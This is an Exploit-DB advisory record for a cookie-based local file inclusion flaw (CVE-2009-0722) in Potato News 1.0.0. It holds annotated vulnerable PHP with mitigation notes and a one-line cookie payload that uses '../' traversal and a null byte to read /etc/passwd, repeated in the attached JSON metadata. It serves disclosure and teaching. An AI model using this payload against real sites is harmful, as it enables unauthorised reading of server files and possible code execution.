ID EDB-ID:8032
Type exploitdb
Reporter x0r
Modified 2009-02-10T00:00:00
Description
Potato News 1.0.0 (user) Local File Inclusion Vulnerability. CVE-2009-0722. Webapps exploit for php platform
#########################################################################################
[0x01] Information:
Name : Potato News 1.0.0
Download :
http://potato-news.googlecode.com/files/potatonews-1.0.0.zip
Vulnerability : LFI
Author : x0r
Contact : andry2000@hotmail.it
Notes : Proud to be Italian
#########################################################################################
[0x02] Bug:
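The vulnerable file is /[path]/admin.php: the value of the "user" cookie is placed, without any validation, into the path that is passed to file_exists() and include().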
[Code]
<?PHP
// Excerpt of admin.php as quoted by the advisory. The outer if block is not
// closed here, so this is a fragment rather than the complete file.
// The "user" cookie is supplied by the client and is fully attacker-controlled.
if (isset($_COOKIE["user"])) {
// The cookie value is copied as-is: no allow-list, length check or
// normalisation happens before it is used to build a path below.
$id = $_COOKIE["user"];
// $id is interpolated into a filesystem path, so "../" sequences in the cookie
// move the lookup outside data/users/ (the directory traversal in CVE-2009-0722).
if (file_exists("data/users/$id.php")) {
// File-inclusion sink: the same client-influenced path is handed to include,
// so whatever file it resolves to is read and executed/emitted by PHP.
// Mitigation: accept only a strict identifier (e.g. letters and digits) or
// resolve the user from server-side session state, and never build include
// paths from request data.
// NOTE(review): this excerpt shows no check other than the cookie value for
// deciding which user file is loaded; confirm against the full file.
include ("data/users/$id.php");
// $usaavatar is not assigned in this excerpt; presumably the included user
// file sets it. TODO confirm.
if ($usaavatar == "") {
// No avatar configured: fall back to the static placeholder image.
echo "<img height='75px' width='75px' src='images/noav.jpg'/>";
} else {
// NOTE(review): $usaavatar is written into an HTML attribute without escaping;
// if users can set that value it should pass through htmlspecialchars().
echo "<img height='75px' width='75px' src='$usaavatar'/>";
}
}
[/code]
#########################################################################################
[0x03] Exploit:
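Exploit: javascript:document.cookie =
"user=../../../../../../../../../../etc/passwd%00; path=/"
Note: the trailing %00 is there to cut off the ".php" suffix that admin.php appends. PHP 5.3.4 and later reject file paths containing a NUL byte, but upgrading PHP alone does not fix the flaw: the cookie can still select any existing .php file outside data/users/, so admin.php must validate the value before building the path.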
########################################################################################
# milw0rm.com [2009-02-10]
{"id": "EDB-ID:8032", "hash": "5db3d76f9932bf3606f3243138aadb4f", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Potato News 1.0.0 user Local File Inclusion Vulnerability", "description": "Potato News 1.0.0 (user) Local File Inclusion Vulnerability. CVE-2009-0722. Webapps exploit for php platform", "published": "2009-02-10T00:00:00", "modified": "2009-02-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/8032/", "reporter": "x0r", "references": [], "cvelist": ["CVE-2009-0722"], "lastseen": "2016-02-01T04:36:02", "history": [], "viewCount": 6, "enchantments": {"score": {"value": 6.7, "vector": "NONE", "modified": "2016-02-01T04:36:02"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-0722"]}], "modified": "2016-02-01T04:36:02"}, "vulnersScore": 6.7}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/8032/", "sourceData": "#########################################################################################\n[0x01] Informations:\n\nName : Potato News 1.0.0\nDownload :\nhttp://potato-news.googlecode.com/files/potatonews-1.0.0.zip\nVulnerability : LFI\nAuthor : x0r\nContact : andry2000@hotmail.it\nNotes : Proud to be Italian\n#########################################################################################\n[0x02] Bug:\n\nBugged file is /[path]/admin.php\n\n[Code]\n\t<?PHP\nif (isset($_COOKIE[\"user\"])) {\n$id = $_COOKIE[\"user\"];\nif (file_exists(\"data/users/$id.php\")) {\ninclude (\"data/users/$id.php\");\nif ($usaavatar == \"\") {\necho \"<img height='75px' width='75px' src='images/noav.jpg'/>\";\n\n} else {\necho \"<img height='75px' width='75px' src='$usaavatar'/>\";\n}\n}\n[/code]\n\n#########################################################################################\n[0x03] Exploit:\n\nExploit: javascript:document.cookie =\n\"user=../../../../../../../../../../etc/passwd%00; 
path=/\"\n\n########################################################################################\n\n# milw0rm.com [2009-02-10]\n", "osvdbidlist": ["52258"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:09:57", "bulletinFamily": "NVD", "description": "Directory traversal vulnerability in admin.php in Potato News 1.0.0 allows remote attackers to include and execute arbitrary files via a .. (dot dot) in the user cookie parameter.", "modified": "2017-09-29T01:33:00", "id": "CVE-2009-0722", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0722", "published": "2009-02-24T18:30:00", "title": "CVE-2009-0722", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}